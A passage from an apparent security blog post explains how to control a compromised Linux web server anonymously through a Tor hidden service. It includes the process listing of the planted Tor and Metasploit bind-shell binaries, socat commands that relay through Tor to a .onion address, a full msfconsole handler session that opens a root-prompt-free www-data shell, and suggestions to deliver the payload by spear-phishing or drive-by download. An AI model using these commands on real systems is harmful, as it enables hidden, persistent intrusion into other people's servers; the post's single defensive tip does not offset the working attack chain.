www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1915     1  0 07:08 ?        00:00:08 /tmp/tor -f /tmp/torrc
www-data  2031  2029  0 07:36 pts/0    00:00:00 /tmp/msfshell.bin
$ netstat -nap |grep 2222
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      2031/msfshell.bin
$

Step 5 – Connect to the hidden service

In shell #1, again we start up socat…

$ socat TCP4-LISTEN:2222 SOCKS4a:127.0.0.1:zcbvswdhpmb7mkgq.onion:2222,socksport=9050

Then, in shell #2, we fire up msfconsole and point it at the socat listener.  Note that RHOST is set to the address of the machine running socat (here, the local machine), not the target – the actual hop to the target happens inside Tor…

root@GTFO:~/Work/Metasploit_dev# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1017 exploits - 566 auxiliary - 167 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD linux/x86/shell/bind_tcp
PAYLOAD => linux/x86/shell/bind_tcp
msf  exploit(handler) > set LPORT 2222
LPORT => 2222
msf  exploit(handler) > set RHOST 192.168.1.112
RHOST => 192.168.1.112
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  192.168.1.112    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started bind handler
[*] Sending stage (36 bytes) to 192.168.1.112
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.112:56788 -> 192.168.1.112:2222) at 2013-01-10 15:56:26 +0800

ls -la
total 1264
drwxrwxrwt  4 root     root        4096 Jan 10 07:39 .
drwxr-xr-x 21 root     root        4096 Jan 10 06:39 ..
drwx------  2 www-data www-data    4096 Jan 10 07:50 .tor
drwx------  2 www-data www-data    4096 Jan 10 07:08 hidden
-rw-r--r--  1 www-data www-data    4434 Jan 10 07:09 log
-rwxr-xr-x  1 www-data www-data     163 Jan 10 07:32 msfshell.bin
-rwxr-xr-x  1 www-data www-data   22076 Jan 10 07:08 nc
-rwxr-xr-x  1 www-data www-data 1230144 Jan 10 07:08 tor
-rw-r--r--  1 www-data www-data     136 Jan 10 07:08 torrc
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
ip-10-128-69-141
exit

[*] 192.168.1.112 - Command shell session 1 closed.  Reason: Died from EOFError
msf  exploit(handler) >

Last Notes:

  • There are obviously a number of variations on this approach; for example, the payload could be delivered as an email attachment, or loaded onto another compromised web server as a drive-by download or spear-phishing destination.  In any case, if the compromised system can establish an outbound connection to Tor, it can become a hidden server and be controlled via that hidden service.  If you are an administrator and want to avoid this happening to your systems, you need to ensure that they cannot establish a connection to the Tor network.
  • It is a real shame that more security tools don’t have native support for SOCKS4a; having to use socat is a real pain.  It would be awesome to see proper SOCKS support in, say, Metasploit, Nessus, Nmap, …
  • While I am on “wishlist” items, it would also be really good to see the Linux meterpreter get a whole lot better.  When I started tinkering with this method, I burnt a lot of time trying to get it working with meterpreter on a Linux x86 target – my success rate was something like 1 in 20 or 1 in 30.  The payload and stager seem to be either unstable or intolerant of the network delays that Tor can introduce.

TLDR:

If a compromised system can establish a connection to the Tor network, it can be used to host a hidden service of the attacker’s choosing.  That hidden service can then be accessed anonymously via Tor.

– @dave_au